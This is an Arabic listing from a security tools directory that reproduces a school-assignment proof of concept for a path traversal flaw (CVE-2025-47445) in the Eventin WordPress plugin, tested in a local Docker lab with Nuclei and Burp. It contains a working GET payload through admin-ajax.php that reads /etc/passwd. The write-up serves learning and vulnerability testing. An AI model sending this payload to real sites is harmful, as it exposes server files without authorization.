Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/inverterad/cve-2025-47445-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubinverterad/cve-2025-47445-poc

CVE-2025-47445-PoC

إثبات مفهوم لاستغلال CVE-2025-47445، وهي ثغرة اجتياز المسار في إضافة Eventin لووردبريس. يتضمن تعليمات إعداد بيئة Docker محلية وخطوات استغلال يدوية.

عرض المستودع
8منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-47445 إثبات الفرضية

يعتمد هذا الإثبات على مهمة مدرسية حيث أردنا العثور على إضافة ووردبريس ضعيفة واختبار هذه الثغرة في بيئة محلية خاضعة للتحكم.

المعلومات
إضافة ووردبريس:Wordpress Eventin
إصدار الإضافة:4.0.26 (أو أقدم)
معلومات CVE:Project Discovery - مكتبة الثغرات
CVEdetails.com
أدوات ذات صلة:بيئة مختبر Wordfence
Docker
Burp Suite
Nuclei

إعداد البيئة

يأتي مختبر ووردبريس Docker من Worfence ببيئتين مختلفتين، إحداهما تحتوي على إصدار PHP قديم، وسنختار الأحدث.

root@kitploit:~
# في مجلد dockerwp84
docker-compose build
docker-compose up -d

بعد ذلك قمت بإعداد صفحة ووردبريس من خلال localhost:1337. قمت بتنزيل إضافة Eventin، وتحديداً الإصدار 4.0.26 من متجر الإضافات، ثم تثبيتها وتفعيلها عبر واجهة ووردبريس.

الآن كل شيء يجب أن يكون جاهزاً.

DAST / Nuclei

أريد التحقق مما إذا كان Nuclei يمكنه العثور على CVE التي أبحث عنها، لذلك أقوم بتشغيل مثيل من خلال حاوية Docker مؤقتة.

root@kitploit:~
docker run --rm projectdiscovery/nuclei -u http://host.docker.internal:1337

لقد حاولت تشغيل Nuclei عدة مرات وحصلت على نتائج مختلفة، لست متأكداً من السبب. لكن في النهاية يعثر على CVE، وبعض الأشياء الأخرى التي لم أكن أبحث عنها تحديداً.

لقطة شاشة Nuclei

Burp / اختبار يدوي

لمعرفة ما إذا كان بإمكاني الوصول إلى ملف /etc/passwd، قمت بإدخال الحمولة التالية في طلب GET الخاص بي.

root@kitploit:~
/wp-admin/admin-ajax.php?action=proxy_image&url=/etc/passwd

وقد نجح الأمر.

لقطة شاشة Burp

الاستنتاجات

تم ذلك لأغراض تعليمية.

تأكد من تحديث جميع برامجك. يتم اكتشاف CVEs جديدة كل يوم.

تنزيل الأداة